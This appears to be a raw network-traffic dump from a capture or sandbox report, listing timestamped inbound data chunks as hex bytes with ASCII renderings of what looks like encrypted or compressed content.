                                                                                                                                                                                    2023-01-05 07:59:31 UTC18396INData Raw: f1 4b 46 d0 71 ab 5d 81 65 04 93 a6 78 3b f9 b5 f7 85 04 2e bd 41 fa b5 1e 85 b5 cc c9 0d 24 49 00 9a 16 ff 1d 27 54 56 80 1c 82 df 36 49 7f 5f 5f 22 f1 75 a4 ba 8c 47 32 ba 90 c3 d1 13 9d 81 48 e2 8e d7 3a f2 bf 10 5a dc 67 a6 42 dd a8 87 26 cf c7 d4 ca 6d 2c ad 3d c2 a2 07 ad ad 11 44 9c bd ff 7b 44 95 03 5f ae e3 ca 07 70 37 10 4b 7e e2 82 5f 02 4c 76 7f 15 25 f9 e5 2b 1c 12 2d a0 50 28 2d 31 86 6d 02 7e 77 a9 8f 07 35 19 be 3e 75 6b 40 57 1c 9e 69 e8 62 f5 c8 bf ad aa 2a e3 7c a9 31 f0 8e d9 9d 07 53 a1 17 fe 54 ba ab ed 7d 44 10 15 34 42 55 d9 5b a0 63 88 92 52 61 69 fb db c7 c1 c2 7d 63 76 6f a4 47 06 84 ba 88 18 89 0a d7 2d 15 50 8d 2c 56 2e a1 20 77 cd 41 ed 2f 53 1e 6c 5b 2f 53 c9 24 bc 29 5a 36 6b 6e 43 39 3d df 40 c5 11 b8 c7 aa 01 59 44 8a d6
                                                                                                                                                                                    Data Ascii: KFq]ex;.A$I'TV6I__"uG2H:ZgB&m,=D{D_p7K~_Lv%+-P(-1m~w5>uk@Wib*|1ST}D4BU[cRai}cvoG-P,V. wA/Sl[/S$)Z6knC9=@YD
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18412INData Raw: b9 08 31 9d 01 e7 36 f3 79 de 18 ee a3 d3 1f f1 fa a5 40 cf 94 bf f9 e6 48 3d db 3f 3a 52 eb b5 a0 ac 2e 75 12 92 e4 be 35 bf 6c 2b 77 2f ae e8 98 98 3e 0a 43 5a 15 ef 54 9c 5f 35 ad 55 2e ca f7 cd e8 f2 b5 ec d9 f1 ac 4e 33 fa 2b 30 ea fb b0 bb 25 69 e8 40 a9 71 08 2b d4 24 96 77 67 3f ec 50 84 88 f2 25 4c 93 fa e1 50 fb e9 1e 73 c4 07 ba 26 4f 8a b5 f2 72 4f 65 db fc 15 b3 af b1 ba eb 74 31 16 5a 76 17 6e 4b 2c 95 7c 09 89 16 4a 6b c2 5f 1a bc 7d b9 a0 14 e6 62 22 8f 37 be 22 12 d5 8d e3 4f 96 27 01 d0 f8 8d 37 52 ae d2 ae 6d 7b e8 fb 5d 3c 04 33 09 a9 e0 67 4d 81 e3 0b 1d 55 3e 9d 56 67 ac 46 1f d1 e3 5b a5 59 94 ec 31 f8 ec b6 06 b6 d2 98 54 c5 06 9e 59 07 cb b3 31 41 98 8d f3 a4 5a 07 c8 46 df aa 3a f7 ce de 39 99 50 86 d7 cc 04 2d 27 de 08 23 c5 5e
                                                                                                                                                                                    Data Ascii: 16y@H=?:R.u5l+w/>CZT_5U.N3+0%i@q+$wg?P%LPs&OrOet1ZvnK,|Jk_}b"7"O'7Rm{]<3gMU>VgF[Y1TY1AZF:9P-'#^
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18428INData Raw: d0 99 08 a9 2f 41 78 ba 49 f5 83 d2 f5 75 9c 01 81 24 cf 0e cd 5c 80 62 13 29 ba b5 a0 82 a0 98 a7 0a 02 2d 90 35 cb d8 d8 41 45 35 0f cf 20 05 2a a1 db 64 40 ae fb f4 8f e7 4d 34 39 38 49 14 db 62 25 e6 d3 a0 09 db 13 b9 32 10 9b a5 a9 ff 41 c0 f8 94 48 4a 48 3f 5b 23 1f 32 32 55 74 54 ac 26 4e 4b ba 71 be 33 b6 d2 62 06 16 17 66 3a ed d3 68 70 02 04 97 b7 5b 80 a2 de f1 a8 4c 8b 2c 03 63 91 94 10 7d f9 b7 0d 04 be a6 1e df 41 04 ba e0 f3 ff a0 8b 5b 10 c4 80 03 33 66 e4 1a 77 52 57 57 82 28 e0 50 43 26 72 97 ab a8 c3 96 5e e4 26 8b 34 d6 bb 74 2a 97 97 14 95 c4 d5 d3 7f 19 6d 66 09 c0 b3 78 3a d4 b3 50 49 ab ea 8c ab 3c 53 0f 2d c2 c7 c3 b2 64 93 de 97 b1 52 37 e6 eb 61 60 bc d5 f8 aa fa 1b ef cd 07 12 a4 75 d1 2c ea 40 49 02 19 82 5e 4f 96 0d 64 82 e1
                                                                                                                                                                                    Data Ascii: /AxIu$\b)-5AE5 *d@M498Ib%2AHJH?[#22UtT&NKq3bf:hp[L,c}A[3fwRWW(PC&r^&4t*mfx:PI<S-dR7a`u,@I^Od
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18444INData Raw: e8 85 00 3b ed c5 7a 88 bd a4 e6 39 2f 10 ae cf 06 a2 16 d2 06 e1 13 87 c9 3b c9 28 e3 f2 13 15 ee 86 47 6f 15 82 e4 a5 fa 97 cc ee 44 13 1b ee fd 51 13 c9 61 ce 4e b5 5c ed 50 e4 4c 22 0c 97 71 5d 52 61 f7 42 d8 10 63 24 0d 45 28 5a 02 25 54 a0 ad 11 82 05 a7 34 7e 94 68 3e e3 33 46 64 14 39 e8 09 01 cc d1 86 2b a8 b3 85 8e fc 67 20 4d 08 13 d4 47 13 e8 a7 dc 2e e8 f7 ba 67 94 2a 50 0f 71 ae 75 d6 f9 6c 82 26 3d 6f 7a 38 b6 b6 d2 85 2e 3a d4 76 e8 88 03 47 32 28 b7 33 ed d5 13 11 39 62 c4 97 f6 bf f6 b3 8c 54 c9 21 fd a6 3a cb 42 22 b5 b5 85 42 2d 13 6d 73 47 8f e4 dc a8 02 d1 b7 2b 50 65 4c 58 01 e3 04 f4 f0 d6 9f 96 d8 64 24 cc ad 27 95 8c ca 28 32 33 e7 8f 67 4c 71 a4 b3 6c 69 ad 4c 37 15 ed 31 f4 6c 06 49 90 1e 80 9f f3 bb 11 02 1c 1b 8b 7e ca 44 c3
                                                                                                                                                                                    Data Ascii: ;z9/;(GoDQaN\PL"q]RaBc$E(Z%T4~h>3Fd9+g MG.g*Pqul&=oz8.:vG2(39bT!:B"B-msG+PeLXd$'(23gLqliL71lI~D
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18460INData Raw: f4 68 72 9d 43 7e d1 4f c0 70 26 9f dc 1f 8d 34 6a 90 de a0 a2 98 d8 34 45 06 a3 96 bd 1a 49 61 2d 0e 86 72 51 0b 0c 09 67 57 53 b2 6c 48 0c 98 3f 77 ba 44 5d 96 ae c3 f0 a2 05 e1 5e 6c 80 f7 07 38 0b 31 62 89 a2 ab 59 e7 a4 57 b9 97 ca b6 e7 5e 77 a4 7f b6 34 31 56 da 04 50 38 64 5b 1d 6e 50 48 c5 24 21 9f 02 ae d6 96 08 2f f0 25 02 35 aa 46 70 9e 4b 3a d9 06 01 86 07 91 bf 98 40 59 48 59 92 f3 c8 68 40 f2 f6 61 d8 87 18 cf 5f 2d 4c 19 cf 47 52 52 58 50 2b 98 63 58 ef da 75 06 54 2d bf a0 42 21 50 bd 74 42 63 ed 07 2e ce de 3c 2d bb c5 57 0e 6c f7 83 24 61 95 a1 96 c6 20 0f 65 77 f0 62 54 f2 59 6c d7 70 05 9b f3 60 6c 04 b0 5b a8 d7 e7 2c 57 32 fd 55 05 7d 57 77 98 d8 7e 96 19 f3 9a a4 04 eb bd ab 8b c1 66 fe e3 d5 d1 22 95 c8 f1 d8 72 89 38 5f 91 61 0b
                                                                                                                                                                                    Data Ascii: hrC~Op&4j4EIa-rQgWSlH?wD]^l81bYW^w41VP8d[nPH$!/%5FpK:@YHYh@a_-LGRRXP+cXuT-B!PtBc.<-Wl$a ewbTYlp`l[,W2U}Ww~f"r8_a
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18476INData Raw: 65 99 93 bb 3f 1b 47 0b c5 4c c0 9b 30 f8 9f c6 fe d0 e1 30 ba 6a ad 1b 99 e0 6b 3f 27 11 48 8e fe 33 40 cd ac ba 32 ed 56 af 89 0a 85 74 72 57 a8 de 7f ca c5 d2 d1 7a 4e 52 f1 28 43 d0 45 77 e8 eb ff 1c c2 38 94 37 e0 ea 5f 62 d9 93 88 07 f8 73 91 3f 57 f2 b5 2b dd 07 15 df 59 3c c4 c4 88 1c 73 3e e7 04 ee b1 db b1 eb 89 ff e6 7d 40 85 12 2c 46 c3 b9 d9 55 23 2d bc ae 69 16 40 8c 7b 0d 2c 8b 26 2b 21 57 65 0f 78 ac ad 91 bf 4f f4 17 8a a6 94 5f 86 13 b7 81 2c 1b db 0a 94 96 fb 61 dd 68 ff ec c2 97 de 59 c8 16 47 8d e9 e3 ee e1 67 06 bd 87 ed 47 70 49 ac 51 16 25 62 63 f5 ee 94 c6 3c d7 f5 ca fc 3c b1 da 3b 48 2d bd 7a 83 59 e2 c0 a0 95 57 80 cb 9d 43 69 0e f5 81 d9 77 64 d8 e8 72 7c 1d 78 14 e8 1c 1b d4 a4 56 28 72 90 73 2a 2e 4e 9b a6 a7 99 8e c5 fc 05
                                                                                                                                                                                    Data Ascii: e?GL00jk?'H3@2VtrWzNR(CEw87_bs?W+Y<s>}@,FU#-i@{,&+!WexO_,ahYGgGpIQ%bc<<;H-zYWCiwdr|xV(rs*.N
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18492INData Raw: 8b ed 81 fb 60 bc 36 c7 d6 4c 75 4f 6d 55 bc 2d 7a 3a b5 ba f4 2a 6e ad 4a cf 65 c4 2f a1 e2 06 e7 6e 2e 94 45 7d de 44 81 a5 43 db b1 9a ea 94 43 ee 39 14 4e 94 81 59 44 3f b6 50 0c 6f 48 42 91 09 f3 c6 78 dd 1a 9f 8a fa 7e 46 2a c6 4d 0b 04 a8 26 a5 49 05 81 e6 02 5e ad ce 98 55 a7 1e 93 1c dd e0 84 50 bd 4b bf 88 63 77 92 47 25 ac e0 4e 4d 0a 48 e6 d9 cd 12 22 df 07 25 ee dc 5d d8 03 ee 8e 7b 3e cc 88 8e 66 40 fc 4a 35 8d c5 66 b3 85 55 4c 2f 2d c9 4a f7 45 ab b4 94 33 91 bc 8c a8 1b 58 0e 6b cc 99 ac 84 04 f8 a2 8a f9 76 48 8f b2 45 90 46 db 4a 5b 58 00 ab 31 b9 67 3c d3 29 49 da 72 48 d2 02 5f bb a3 db bc 90 e3 e0 2b 4c e3 21 4b fc 40 be 72 a7 ef 2e d5 70 00 75 98 46 8c 1e 30 a2 e6 80 ed ff a3 48 c5 cd c5 f9 be a9 92 ae ec dc 19 6a 45 07 ff 26 2d b6
                                                                                                                                                                                    Data Ascii: `6LuOmU-z:*nJe/n.E}DCC9NYD?PoHBx~F*M&I^UPKcwG%NMH"%]{>f@J5fUL/-JE3XkvHEFJ[X1g<)IrH_+L!K@r.puF0HjE&-
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18508INData Raw: 49 42 69 f5 c0 4b 3d 44 4a 6f c8 4b 1e 3a d0 fc 2c 25 6e 1e 33 ce a9 3e 2d ae be b7 58 67 47 1a 2b d7 e0 ec 47 10 b5 0a c7 d7 6c e6 e5 fa 3f 97 a6 ba 51 22 2c 2b 2f c5 1b fc ea 25 62 90 b7 bb 8f 27 6a a3 94 a9 ea 32 0b aa 40 69 e5 f2 70 84 8a 95 9f 6c 53 7f 6e d6 fe 7d 9f 03 33 c1 99 8a 08 d5 ad c9 f2 1b a2 f5 31 ba d7 14 df ad ab 01 17 f8 87 42 50 9d 7e 82 42 4d a6 49 1b 54 be 0f d2 28 27 ce 58 1c e6 8f 40 d8 e6 ce f6 90 72 1f d2 54 10 84 16 b4 f1 0f 61 e3 10 2d b6 b9 b5 99 c9 5b 81 33 2a db ff c3 7e d0 60 40 d7 5d 79 2e 51 14 2e fc 77 ab ac 1c a8 35 56 8a 02 b3 83 a3 84 d8 ae 51 4a fd 06 c6 3a 24 a2 f8 04 a8 dd de ee e2 6a 86 ae b3 6d 08 78 e8 79 e8 34 80 34 1c 5f 3b df 90 fa 5b 81 f8 d9 6f 32 2c ca 5e b5 a8 67 46 c6 1b 8d fc fe f1 88 a8 be f9 b1 fa ff
                                                                                                                                                                                    Data Ascii: IBiK=DJoK:,%n3>-XgG+Gl?Q",+/%b'j2@iplSn}31BP~BMIT('X@rTa-[3*~`@]y.Q.w5VQJ:$jmxy44_;[o2,^gF
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18524INData Raw: 47 41 51 b5 0e 9f 3f b1 0d bb a4 80 bb b4 35 16 0d d2 38 6a 65 50 a2 1f 5e bb a0 d9 8e a6 c5 d0 1e 82 a8 81 0b c8 d8 c3 5d 92 4e 78 66 07 40 64 5d ec 60 17 dd fa 87 97 e2 17 4b 8d 75 04 43 bf cf 43 78 af d8 af c7 c6 01 1b 6c 13 0f 29 a0 d0 3d 13 7c d3 d6 7f ab 96 1d ea 48 4d 56 de ab 32 ee 14 09 e7 af 06 4b a5 88 24 f8 14 d3 79 f9 0b f6 2a 84 4a 46 bf b2 1d 40 59 83 8d a3 12 2f 76 e4 e4 a3 b8 cb 76 26 77 66 78 fc 25 cd 6f 40 72 f4 03 2a 8f ce 08 7d bc ec b5 b1 d9 89 77 0e 26 be 7c 8b 97 8f 1e 07 cb a7 7c db 0c 15 ad d4 01 82 03 75 c4 52 54 ff c5 8e 79 bc b4 0b 93 fe 02 dd f7 77 8b e6 67 fe eb 5b 0e 37 00 ec 77 99 88 27 39 28 6a af 70 dc 9b 08 ff 39 ea ff c4 20 6a e0 13 fa 49 86 b9 7f 8a c5 88 e4 95 f6 b7 61 1a 93 b4 35 89 ce 8c cc 19 6d b7 42 4b 64 82 6c
                                                                                                                                                                                    Data Ascii: GAQ?58jeP^]Nxf@d]`KuCCxl)=|HMV2K$y*JF@Y/vv&wfx%o@r*}w&||uRTywg[7w'9(jp9 jIa5mBKdl
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18540INData Raw: a8 92 88 f1 06 ad 01 b5 48 ef 8f 69 e4 53 8e 9d 57 03 2a b3 3c a8 dc c5 f6 08 d1 6c 5c 4c 2e 93 3c 7a 1c f5 88 cb 86 9c 80 49 40 32 b4 e2 32 cb 1c b6 b2 8d ac 76 c9 2c ba f5 83 53 83 60 65 18 97 81 db 66 c2 eb 08 88 d7 8c 3f 9e e6 7b 60 53 9f 14 94 13 db a4 38 77 29 12 f4 f5 3c 1f 0a f2 3a ba 06 22 76 4b 89 7f bc 87 2c d0 73 6c 56 02 2e 0c 8a d6 4e ba eb 32 11 54 8f bc 7d 91 b8 94 70 72 b5 b2 d2 d8 cf b6 3e 88 ae 9c 63 dd 56 66 47 2c 9d cb 93 56 63 a2 ad 5c c9 e5 11 74 64 ba c9 d5 05 15 85 02 da 62 de 4a c9 d9 86 09 5b a9 e7 81 74 3d c0 0c 6a 3c 29 6a e5 bf ef 2b 48 1b a9 53 6a af 34 46 0f 6f f7 bf 7c 2f bc 64 e8 9f 94 77 68 32 e4 37 14 2e e2 46 96 13 bf 5f a9 b9 df f9 a6 cd 28 a0 b5 be 27 71 85 8d 92 f7 e5 38 b6 37 19 d9 eb 7b d5 5b 2c 2b 16 c9 2c 30 15
                                                                                                                                                                                    Data Ascii: HiSW*<l\L.<zI@22v,S`ef?{`S8w)<:"vK,slV.N2T}pr>cVfG,Vc\tdbJ[t=j<)j+HSj4Fo|/dwh27.F_('q87{[,+,0
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18556INData Raw: 85 5f be d7 d3 21 c2 15 a1 32 57 dd f8 0a 1c a0 32 ed 5c a4 25 d5 97 77 61 c7 e2 57 19 57 21 b3 9a e9 0a 6c ce 6f a2 bf ed 57 67 b4 12 b6 79 23 ac a7 bd 4f b5 dc b7 fc 20 fc 00 94 5b 97 e3 63 cb 4d 7b 68 42 02 b9 ce 4d d4 48 1f 29 7d 54 01 ee 06 99 3f 41 ee cf af c1 6d 76 fb 43 2f 2e 7d b4 17 7f ba c8 fe 62 8d 89 bf 29 e4 0f e6 a7 48 39 03 cf 8b f9 4d 16 c0 da 48 ae f9 a3 52 58 82 23 26 22 54 d4 77 f7 13 b5 58 de b2 ca 0f a3 e7 b1 ac 77 d1 92 77 0d 93 51 ad 51 55 bf 4f 11 71 1c 23 d0 14 56 d6 12 ec 98 14 21 60 40 2c f3 cd c7 d1 ba 6f 50 d4 3f 4b b3 24 ec c9 4a 37 f0 bb 8f a3 32 35 1a 33 2d 33 b0 ad cc aa 06 b4 c1 97 3e a1 c5 37 5c c4 65 2c fa 18 43 58 ca 17 d0 d3 4e ae db 38 36 0c 81 c1 6c 15 4f 5f 83 1d 4e 61 f9 99 76 67 23 89 48 9e 18 c0 01 a0 e6 27 e8
                                                                                                                                                                                    Data Ascii: _!2W2\%waWW!loWgy#O [cM{hBMH)}T?AmvC/.}b)H9MHRX#&"TwXwwQQUOq#V!`@,oP?K$J7253-3>7\e,CXN86lO_Navg#H'
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18572INData Raw: 00 03 c8 66 af f6 41 dc b0 35 ac ad 11 7c c0 8a d6 4d 80 ca 51 50 8b 5c af 1f 36 71 17 c6 5b bd 89 f3 67 3b 0a cd df 42 63 23 8c e6 61 ad 0f 9b 4e 27 de f0 72 61 24 9d 86 88 9d 5e bc df 3b 1a d8 90 b2 d5 e3 7b 2a 8b 94 a6 3f ed 5e da bc af ed 11 df 3e 22 c1 84 b7 36 b3 9c 9a 2c 84 a7 32 54 1d 14 0b 99 30 65 ea ee 97 99 9c 6a e8 31 48 fb 43 16 aa 05 b5 2a 5e c3 13 c4 26 6d 21 0f 66 0a 07 4c ff a7 7a d4 24 8d 96 01 3c d9 c8 81 39 bf bc 37 83 5e 7f 86 17 75 fa 07 90 0f 9f 97 19 31 0d be 2d 3f e3 6e c7 c8 ab 56 1c 1d 36 07 d9 8a ba 1e a9 95 98 6c 30 ad dd 20 e3 d7 1b 3c 08 7f 7c 4e 99 4e 64 79 24 cc ab 35 eb cf 4f 0e 4c 05 79 dd 5e 59 73 a7 61 04 49 8b fa e9 9b bc 61 3b 08 d4 49 b5 f2 40 2f 37 9f c0 8b ab 13 c3 2f 3c ca fc 8a 70 27 f5 d2 52 a9 1d 7e 62 0c 31
                                                                                                                                                                                    Data Ascii: fA5|MQP\6q[g;Bc#aN'ra$^;{*?^>"6,2T0ej1HC*^&m!fLz$<97^u1-?nV6l0 <|NNdy$5OLy^YsaIa;I@/7/<p'R~b1
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18588INData Raw: 51 b2 74 76 f6 6a 3c a5 31 a6 3b e2 65 65 48 33 48 4f a9 81 c1 ed df 79 9a e2 df 5a 84 91 70 34 36 2b c6 e9 1b b9 ee 56 99 6c 5f b1 d4 31 7c 9e d9 dc 01 7f 73 ad f5 6b 80 2e fe b3 bc 2e eb 7e 92 4e 8d 2b 81 24 9c c0 d9 bf 9e fd 56 ac f9 b6 dd ca 3e b1 91 32 04 87 fb 2e 0f 0a 3e 82 1b cf 89 7d 36 79 e9 26 ee 78 a0 0e a4 f5 81 0e 7f 5b 8a 29 77 38 18 06 a6 66 97 d9 f9 af 7a ce 7a be 4d d2 d4 bf f0 2a 23 ff e9 b3 83 08 28 12 6c 4d 61 c6 3e 6f 9f d8 d2 7c 68 56 75 29 dc 23 36 cc 44 00 c5 20 5a 0e fd 70 c4 46 72 7b 3d 4d 1e 0d 85 68 58 32 f7 70 80 09 c8 66 b8 81 e4 a7 99 47 90 fc 51 e6 54 68 10 b8 7e 2e 77 72 6e 88 28 12 90 2d 7e bf ad c0 c9 2c f4 ac d3 13 ea c7 38 93 8e 58 38 a6 f9 42 7e 57 3e 00 cb a7 ce 09 81 d2 fa f9 81 d1 b2 67 70 0d ba 68 72 d1 71 bb 94
                                                                                                                                                                                    Data Ascii: Qtvj<1;eeH3HOyZp46+Vl_1|sk..~N+$V>2.>}6y&x[)w8fzzM*#(lMa>o|hVu)#6D ZpFr{=MhX2pfGQTh~.wrn(-~,8X8B~W>gphrq
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18604INData Raw: 62 ca 7e fa d8 b0 8e bf d1 1b 71 12 ec fe 67 71 63 64 8a f0 9b 41 cf 88 e4 af 00 d3 31 2d 9a 3e 35 12 16 6a 17 55 bd 41 ff 16 8f 44 7b b4 55 60 6a f9 85 09 2a 3c 16 3e 10 b0 1c 65 86 20 6b 7b 46 00 a9 48 fd 80 20 3b cf 69 4f 61 fd 17 ec d8 7a e2 20 cc 2b ba e4 96 a4 14 07 ac 04 9a 72 a3 9f 76 bc 75 64 07 fc 78 d7 81 87 4a 8d 5c ca 8f 25 0b 4f 18 b9 42 68 a4 3e 9e 1c 99 32 8f 7b 23 8f c7 a8 21 87 9b 6b 15 e0 25 24 2e eb b0 6b 9e 19 63 76 f6 4d a7 74 8b 6d 68 49 e5 5e 54 26 04 1d e4 2f da 19 c9 cc f2 7d 3c c8 2c dc 0b 8c 7d e7 c2 dd a5 1a de 96 46 8b 5c d3 e7 ab 4b 8f cd 49 d8 50 2a 49 cf e4 5f 65 db ec 0e 37 3f 19 33 62 dc 4a 46 5b 33 c8 df 2e 53 62 66 a1 e1 cc da a6 ad 76 fc 15 39 78 e5 6c f6 c8 50 53 71 ab 3a 17 ee 15 62 b1 40 61 51 ba cb e4 99 96 54 80
                                                                                                                                                                                    Data Ascii: b~qgqcdA1->5jUAD{U`j*<>e k{FH ;iOaz +rvudxJ\%OBh>2{#!k%$.kcvMtmhI^T&/}<,}F\KIP*I_e7?3bJF[3.Sbfv9xlPSq:b@aQT
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18620INData Raw: 18 7e eb 1a cc 69 f0 80 67 78 75 95 64 32 dd 11 f3 fd 70 ff 14 53 91 8c ce 4d 1d 75 51 51 c6 8f e3 a4 05 fd 90 11 f0 cd af e3 ea 4c b3 e6 3f 29 c7 ea 25 6e 86 4c b6 71 15 d3 aa 54 93 ee 6d ed 9f 32 7f 63 9a 16 9b 90 03 b5 6d 5c a6 4e 12 f7 ab a2 db 5c 46 f7 d5 a4 0e 94 88 fe 07 ff a9 36 79 02 14 99 ac 14 11 f5 30 ad c5 b1 da 53 d9 69 71 2c 84 84 ad d6 f8 40 26 bd fb b2 99 77 0a 55 e0 31 5b 02 04 ee 40 cd c8 1c 34 37 e8 c7 fa 7d a7 a0 85 d2 0e 09 9e 8d 7c 7d 95 22 fb fd f2 a4 56 a8 14 1e 35 4b 51 af cc 4a 8c 99 7a 1b 02 f1 b1 b9 02 68 21 58 c3 62 40 b8 aa 2a 8d e5 90 ab 78 67 b3 20 61 1a ee ff 77 d2 b1 93 91 d3 45 50 25 0d d3 5c f0 73 9b 90 c4 7e fd 4c 44 f8 8c bb 0d eb 29 c1 90 21 ee 75 b4 9c 25 8b c0 cc 30 c8 92 d6 dc 3d c4 c2 fc fb fc 4f a4 6b 85 bd 53
                                                                                                                                                                                    Data Ascii: ~igxud2pSMuQQL?)%nLqTm2cm\N\F6y0Siq,@&wU1[@47}|}"V5KQJzh!Xb@*xg awEP%\s~LD)!u%0=OkS
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18636INData Raw: eb 11 11 78 40 0e 34 69 13 b9 86 29 ea 95 8f 01 02 16 14 f4 4a 48 64 b6 03 1e 4d 93 92 43 c6 f2 4f b5 39 e0 27 46 f1 3f 8a 48 37 2e 3a eb 38 51 a0 d4 c1 e5 8e 4f 3b dc e6 98 10 79 37 96 30 f9 3b 2b 68 57 a0 8b 88 cd 3d b5 37 8e 27 1c 4b 31 e3 fc 0f 2b b2 fc b7 e6 29 bf 3a 48 47 9a 3d b6 26 f2 0f 33 16 2f 59 f3 c0 0f 05 7f 23 f7 40 dd f6 7d 45 93 05 d7 27 3a 29 2f ac b9 f8 19 30 a7 f0 6d e8 9d ef 73 6b e6 a0 14 41 f4 51 61 fa 43 50 d4 93 a7 f2 fa 9b 44 c1 18 9d 93 b5 8d 8a 59 da a2 a2 c0 1e 63 71 d2 ad 57 9e ab cf 21 f7 f9 a1 32 72 22 d0 6d 7a 53 43 84 82 64 17 7a bc bc da 93 0f 43 7e 94 af 6d 34 87 b7 7e 6f b5 2c 95 9c 41 7d 06 9d 8d 40 41 69 f8 b1 1c 31 2e 51 2c 14 3f aa 69 89 d5 0f 8f a8 95 e4 a9 7d 08 8a ee 1d e6 93 24 8c c3 ce 65 32 45 6b 95 42 06 97
                                                                                                                                                                                    Data Ascii: x@4i)JHdMCO9'F?H7.:8QO;y70;+hW=7'K1+):HG=&3/Y#@}E':)/0mskAQaCPDYcqW!2r"mzSCdzC~m4~o,A}@Ai1.Q,?i}$e2EkB
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18652INData Raw: c1 ae f1 ac 76 05 e3 7b 8e c9 e7 32 a3 8e 79 b1 27 90 5e 4e 28 8b e4 a7 bd d9 06 e8 6c 35 93 f4 d1 24 45 99 97 aa 32 6a db 80 ee e7 2c 17 c1 04 d3 54 52 90 8d db 2a 55 56 b9 ac e7 31 b3 d9 48 6b ed 27 1c 06 e8 6e b7 2b 4b 5d 15 6d df b9 42 bc 21 ec 70 09 bb 13 c1 bf 30 83 ca c6 fd 97 94 64 13 fd d8 29 51 3e 2b 20 8d b3 64 02 8f e8 ab 9f 01 56 8e eb 9a 47 1d 91 d9 30 69 45 6f 9f 60 95 b5 c1 74 b1 73 cd 49 c3 a4 42 0f e4 0d 05 01 14 38 22 a1 60 fb 36 0b 06 45 e3 c4 90 4e e3 8b 56 1a b7 dd 21 84 e2 a9 60 4e e1 7a 15 c3 a5 1f 00 a5 47 8e 9b 25 76 25 a3 3a 75 7c 26 a6 6e 7f 45 f4 0e 32 67 55 ad 1b 99 8c 71 95 37 f6 91 37 4f 1b 56 62 47 6d 47 8a 5b f1 ab ab 39 88 b0 3e 47 7f 64 e3 78 ef 1b a8 c9 0e f4 94 17 a2 fe 9f 9f 00 29 7f 06 c8 ce b1 5b bc e7 80 da 57 06
                                                                                                                                                                                    Data Ascii: v{2y'^N(l5$E2j,TR*UV1Hk'n+K]mB!p0d)Q>+ dVG0iEo`tsIB8"`6ENV!`NzG%v%:u|&nE2gUq77OVbGmG[9>Gdx)[W
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18668INData Raw: b2 b1 4a 23 33 c4 b3 f2 bd 7c 1f c2 e3 7b 1d ae 6a 49 d1 98 26 28 55 d4 14 60 68 04 8e 71 74 29 ce 68 a5 72 e7 45 86 cb 98 e2 27 a2 cc d5 c0 36 5a 17 2c d0 ee 95 31 ae 42 dc c9 c4 d9 f8 c6 64 22 d6 78 39 b8 d9 ac 00 f8 78 63 12 30 53 d4 a2 1e 8e 1a dc 7a 0d 4a 81 ef f9 5a ad 63 3e 43 4e cb 0d f9 e7 e0 92 f0 36 39 89 b5 ce 3b 40 c4 cb 71 0b b9 5f 13 fe 1c 3b b6 b6 02 b8 c2 5d 9b 88 d3 b0 7d 6e 51 8e 78 e9 38 58 36 b0 6d 43 f2 e3 69 69 d5 6e bd 25 d4 b9 d9 58 54 84 b4 75 21 df c7 e6 80 b3 e6 c2 20 12 77 3f 5c 63 21 41 93 23 43 c3 47 94 43 21 bf d1 2f 5c 2d c2 78 fd 50 83 46 45 aa 48 1f 40 22 d6 32 11 7a 02 d3 a9 72 84 da 4b d9 58 12 97 db df 5c 5f 6d 2a 8c 23 cc 51 f0 68 53 43 24 aa 9f 39 7d 65 1c af a4 3a c9 9e 57 f2 e7 b8 c8 67 dd 25 ff b5 05 e1 5a 11 a8
                                                                                                                                                                                    Data Ascii: J#3|{jI&(U`hqt)hrE'6Z,1Bd"x9xc0SzJZc>CN69;@q_;]}nQx8X6mCiin%XTu! w?\c!A#CGC!/\-xPFEH@"2zrKX\_m*#QhSC$9}e:Wg%Z
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18684INData Raw: 34 81 5c 77 2c f6 ca 3a 75 73 62 8e 18 5c ef d0 98 9a 33 6e 38 6c ea c1 7c c4 c0 02 7d b1 86 bc 57 a8 31 3b de 98 d4 3f 8e 3c f9 e6 f9 5d eb 06 bd 0f fe 23 13 18 2c 05 15 c8 21 89 4a a7 eb 7f 9b 64 75 0c 97 c2 ee 24 54 a7 a2 e0 04 f4 73 73 fa 24 df b0 89 22 8a 4f 64 f0 3a fc b3 07 20 64 4d 62 87 77 aa ef 7e d1 6d a3 08 64 49 69 bc 58 eb 7e 19 f5 f2 d5 31 6b b3 70 75 e9 ec 6c 93 fc fe 17 67 56 31 29 0c 47 36 cc d5 23 25 e9 0a 82 e5 eb b1 c9 e7 2c 79 ab 06 fc 3f 78 36 10 a2 b9 d4 1a 92 55 3a 63 21 b7 32 a0 f0 69 10 20 44 f2 d4 6d f5 57 5a 5d ab 85 e4 b0 78 74 8b 19 c7 0f db 67 79 ac 4d 69 88 22 a5 cf 31 6a 00 82 2e cf 6f 5b 02 3c 6f eb 7b ba e7 3d e6 5c b0 17 46 62 cd ff 1f 10 93 9c c4 d7 8e f3 c3 df cb fe a6 dd ad f7 15 f7 ba b9 fa 34 d0 22 e3 ad 3a 3c 9e
                                                                                                                                                                                    Data Ascii: 4\w,:usb\3n8l|}W1;?<]#,!Jdu$Tss$"Od: dMbw~mdIiX~1kpulgV1)G6#%,y?x6U:c!2i DmWZ]xtgyMi"1j.o[<o{=\Fb4":<
